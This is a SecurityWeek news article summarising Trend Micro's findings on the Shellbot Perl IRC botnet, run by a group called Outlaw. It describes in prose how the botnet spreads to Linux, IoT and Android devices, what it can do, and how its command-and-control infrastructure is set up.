Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Malware & Threats

Shellbot Botnet Targets Linux, Android Devices

An IRC bot built using Pearl is targeting Internet of Things (IoT) devices and Linux servers, but can also affect Windows systems and Android devices, Trend Micro warns.

An IRC bot built using Pearl is targeting Internet of Things (IoT) devices and Linux servers, but can also affect Windows systems and Android devices, Trend Micro warns.

Dubbed Shellbot, the malware is being distributed by a threat group called Outlaw, which recently compromised FTP servers of a Japanese art institution and a Bangladeshi government site. The hackers linked compromised servers to a high availability cluster to host an IRC bouncer and control the botnet.

Previously, the botnet was being distributed via an exploit targeting the ShellShock vulnerability, hence its name. Last month, IBM observed attacks targeting the Drupalgeddon2 vulnerability (CVE-2018-7600) to distribute the botnet.

The campaign Trend Micro’s security researchers investigated, however, leveraged previously brute-forced or compromised hosts for distribution purposes. The bot was observed targeting Ubuntu and Android devices.

By looking at the botnet’s command and control (C&C) traffic, the security researchers found the IRC channel’s information and discovered around 142 hosts in the channel at the first infection.

To infect hosts, the malware first runs a command on the target, to verify that it accepts commands from the command-line interface (CLI). Next, the working directory is changed to “/tmp” and the downloaded payload is run with Perl interpreter. The payload is removed in the final step.

Once the Shellbot backdoor is up and running on the infected system, the IRC channel’s administrator can send commands to the host, to perform a port scan and various forms of distributed denial of service (DDoS), to download a file, get information about other machines, or send operating system (OS) information and a list of certain running processes.

The security researchers also discovered that the attackers would often modify the contents of the files hosted on the C&C server. The modification, deletion and addition of files mostly happened during daytime in Central European Time/CET, but never at night or on weekends.

Advertisement. Scroll to continue reading.

The use of an IRC bot isn’t a novel tactic, especially with the code used in these attacks being available online, Trend Micro notes. The operation targeted big companies, but the group hasn’t engaged in widespread attacks, the security researchers also point out.

Related: Hackers Exploit Drupalgeddon2 to Install Backdoor

Related: New Virobot Ransomware and Botnet Emerges

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Malware & Threats

The NSA and FBI warn that a Chinese state-sponsored APT called BlackTech is hacking into network edge devices and using firmware implants to silently...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Cyberwarfare

An engineer recruited by intelligence services reportedly used a water pump to deliver Stuxnet, which reportedly cost $1-2 billion to develop.

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.

Malware & Threats

Apple’s cat-and-mouse struggles with zero-day exploits on its flagship iOS platform is showing no signs of slowing down.

Cybercrime

No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.